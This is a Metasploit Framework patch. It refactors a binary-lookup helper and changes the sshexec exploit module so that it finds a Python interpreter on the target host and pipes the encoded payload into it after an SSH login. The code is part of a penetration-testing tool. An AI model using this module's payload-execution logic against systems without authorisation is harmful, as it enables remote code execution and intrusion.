From b85031ff6adb68df5a9ced5448d905b6776014d3 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 18 Jun 2021 13:33:20 -0400
Subject: [PATCH] Fallback to Python3 in sshexec when it's available

---
 lib/msf/base/sessions/command_shell.rb | 29 ++++++++++++++++++--------
 modules/exploits/multi/ssh/sshexec.rb  | 15 ++++++++++++-
 2 files changed, 34 insertions(+), 10 deletions(-)

diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb
index d7da9c540bfd..9516d8d2e2bb 100644
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -328,22 +328,33 @@ def cmd_shell(*args)
     print_error("Can not pop up an interactive shell")
   end
 
+  def self.binary_exists(binary, platform: nil, &block)
+    if block.call('command -v command').to_s.strip == 'command'
+      binary_path = block.call("command -v '#{binary}' && echo true").to_s.strip
+    else
+      binary_path = block.call("which '#{binary}' && echo true").to_s.strip
+    end
+    return nil unless binary_path.include?('true')
+
+    binary_path.split("\n")[0].strip # removes 'true' from stdout
+  end
+
   #
   # Returns path of a binary in PATH env.
   #
   def binary_exists(binary)
-    print_status("Trying to find binary(#{binary}) on target machine")
-    if shell_command_token('command -v command').to_s.strip == 'command'
-      binary_path = shell_command_token("command -v '#{binary}' && echo true").to_s.strip
-    else
-      binary_path = shell_command_token("which '#{binary}' && echo true").to_s.strip
+    print_status("Trying to find binary '#{binary}' on the target machine")
+
+    binary_path = self.class.binary_exists(binary, platform: platform) do |command|
+      shell_command_token(command)
     end
-    unless binary_path.include?("true")
+
+    if binary_path.nil?
       print_error("#{binary} not found")
-      return nil
+    else
+      print_status("Found #{binary} at #{binary_path}")
     end
-    binary_path = binary_path.split("\n")[0].strip  #removes 'true' from stdout
-    print_status("Found #{binary} at #{binary_path}")
+
     return binary_path
   end
 
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 9275f75225b3..0f2f8ca56340 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -199,13 +199,26 @@ def do_login(ip, user, pass, port)
     fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
   end
 
+  def binary_exists(binary, platform: nil)
+    Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))
+  end
+
+  def execute_python
+    python_binary = binary_exists('python', platform: 'unix')
+    python_binary ||= binary_exists('python3', platform: 'unix')
+    python_binary ||= binary_exists('python2', platform: 'unix')
+    fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?
+
+    execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
+  end
+
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
 
     case target['Platform']
     when 'python'
-      execute_command("python -c \"#{payload.encoded}\"")
+      execute_python
     when 'unix'
       execute_command(payload.encoded)
     else